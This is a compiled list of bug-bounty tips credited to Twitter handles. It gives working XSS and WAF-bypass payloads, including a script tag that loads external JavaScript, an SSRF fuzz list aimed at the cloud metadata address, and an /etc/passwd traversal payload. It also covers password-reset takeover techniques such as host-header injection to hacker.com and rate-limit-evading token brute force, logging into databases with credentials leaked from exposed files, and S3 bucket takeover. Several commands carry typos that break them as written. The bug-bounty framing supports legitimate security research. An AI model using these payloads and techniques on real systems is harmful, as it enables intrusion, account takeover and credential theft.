Hints

Below are twitter handles

@D0rkerDevil

Webarchive > internet.domain.com > dirsearch > found .git/index file used gin to read the index file

pip3 intall gin 
gin  <index file
found .env file

opened > full of credentials access to their mysql database

connect using: 

mysql -u username -p -h <ip/host> 
password: <password>

@Sh_O_A1b 

amass enum -d target.com -passive -o s3subs.txt 
s3scanner s3sbus.txt

Might find hidden misconfigured S3 Buckets, if have write permissions, you can takeover the bucket and report as High/P2

Twitter - PhpMyAdmin Account Takeover

1. Found a Wordpress Website with Search Parameter

2. Got an Easy SS on the same parameter

3. While looking for making more impact with XSS, Application Crached Unexpectedly.

4. Error Message REvealed “Database Connection String” revealing the DB name, Username, Password, etc

5. Did some more research, directory brute force got me “phymyadmin” directory in /c/soft/phpmyadmin.

6. Used the credentials revealed from "Connection String and Looged in Succefully.

Takeaway

  • If you get XSS on Wordpress, try some random other payloads.

  • Application's logic may break and reveal internal information.

  • Recon, Recon & Recon to see the use of the information

@Wh11teW0lf

“Jenkinsfile” can give you passwords from Jenkins instance. Add this to your wordlist

anydomain.com:8080/Jenkinsfile

@PortSwiggerRes

Firefox is the only browser which allows self closing script.

@HusseiN98D

XXE by injected METADATA in Image bytes → Blind SSRF via local dtd → grabbed AWS EC2 credentials blindly → Powned

@GochaOkradze

Bypass F5-Big WAF with XSS payload

Interesting is %5k converted to “P” characted

Payload 

"><P/onweel=alert(1)>mouse wheel here<!-- Injected Payload %22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--

@Enesdex

Easy Automation XSS Tip 

cat subdomain.txt | waybackurls >> wayback.txt 
cat subdomain.txt | hakrawler -depth 3 -plain >> spider.txt 
cat spider.txt wayback.txt | kxss
Hakrawler by @hakluke 
Waybackurl, kxss by @TomNomNom
Recommended dalfo instead of kxss 
cat spider.txt | grep “=” | dafox pipe 
dalfox by @hahwul

@rez0__

Use ffuf for vhosting on every new domain to find hidden servers/admin panels: 

fuf -c -u https://target.com -H “Host: FUZZ” -w vhost_wordlist.txt

Pro-tip: do both “Hosts: FUZZ” and “Host: FULL.target.com”

@pwntheweb

Fuzzing list to FIND SSRF 

site.com/?url=FUZZ
http://169.254.169.254\0.google.com
<=== PHP cve2020
https://[0:0:0:0:0:0:0:0]
https://0.0.0.0
https://[::]
https://0177.1
https://0x7f.1
https://0x7f000001
https://2130706433
https://127.000.001
https://[0:0:0:0:0:ffff:0.0.0.0]
https://[::ffff:0.0.0.0]
https://017700000001
https://[0:0:0:0:0:ffff:127.0.0.1]
https://[::ffff:127.0.0.1]/
https://[::ffff:7f00:2]
https://[:ffff:127.0.0.1]
https://[::ffff:7f00:1]
https://[0:0:0:0:0:ffff:127.0.0.2]
https://[::ffff:169.254.169.254]
https://[0:0:0:0:0:ffff:169.254.169.254]
https://[::ffff:127.0.0.2]
https://[::ffff:a9fe:a9fe]
https://[::ffff:0:0]
https://169-254-169-254.nip.io

@faizalabroni

Just found and triaged private program for bypass HTTP auth. CHange Method from GET to POST 

GET /oauth2login got http auth 
POST /oauth2login/index/ bypassed to internal panel

@hussein98d

Testing Password REset Functionalities:

1) Include your mail as a second parameter (you might receive the reset link): 

POST /reset 
[...] 
email-victim@tld.xyz&email-hacker@tld.xyz

2) Brute force reset token if it is numeric. YOu can use IP Rotator on Burpsuite to bypass rate limit in case it's IP baed: 

POST /reset 
[...] 
email=victim@tld.xyz&code=$BRUTE$

3) Try to use reset token on target's account: 

POST /reset 
[...]
email=victim@tld.xyz&code=$YOUR-TOKEN$

4) Host header injection : change website.com to hacker.com (victim might receive the reset link with your host instead of the original website's) 

POST /reset 
Host: hacker.com 
[...]

5) Try to figure out how the tokens are generated. Example can be:

-Generate based on TimeStamp

-Generate based on the ID of the user

-Generate based on the email of the user

@xlocux

1- Completely remove the token

2- change it to 000000000000

3- use null/nil value

4- try expired token

5- try an array of old tokens

6- look for race conditions

7- change 1 char at the begin/end to see if the token is evaluated

8- use unicode char jutzu to spoof email address

9- try victim@email.com&attacker@email.com use %20 or | as a seperators

10- try to register the same mail with different tld .eu.net,etc

11- don't add the domain locu@

12- try sqli bypass and wildcard or, %, *

13- request smuggler

14- change request method (get,put,post,etc) and/or content type (xml<>json)

15- match ba response and replace with good one 16- use super long string

@akita_zen

with CLRF /resetPassword?0a%0dHost:atracker.tld (x-host,true-client-ip,x-forwarded...)

@11xuxx credit to @joohoi

Using ffuf right way and gaining admina ccess

1. “ffuf -u ... --mc all” -> match all responses codes

2. ctrl+c after 5 sec

3. "ffuf -u ... --mc all -fw ...

4. found a backdoor developer used to login as admin (response code 404)

@z33_5h4n

Filter bypass

<style/><img src="z'z</style><script/z>alert(1)</script>">
<sempak/merah>alert(1)</sempak>">
<script/z> can lead external js:
<script/z src=//external.com/1.js>

@rodoassis

Bootsrap payload bypassing WAF filters

<Brute Data-Spy=scroll Data-Target='<Svg OnLoad=(confirm) (1)>'>

@Random_Robbie

Got a SSRF inside a company ASN?

Not Cloud metadata endpoint to hit?

Don't forget to scan for internal hosts and try sqlmap

sqlmap via ssrf!

@RockyBandana

Arbitrary file read

![a](/uploads/1111111111111111111111111111111111111111111111111/ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../etc/passwd)

PreviousBug BountyNextPython

Last updated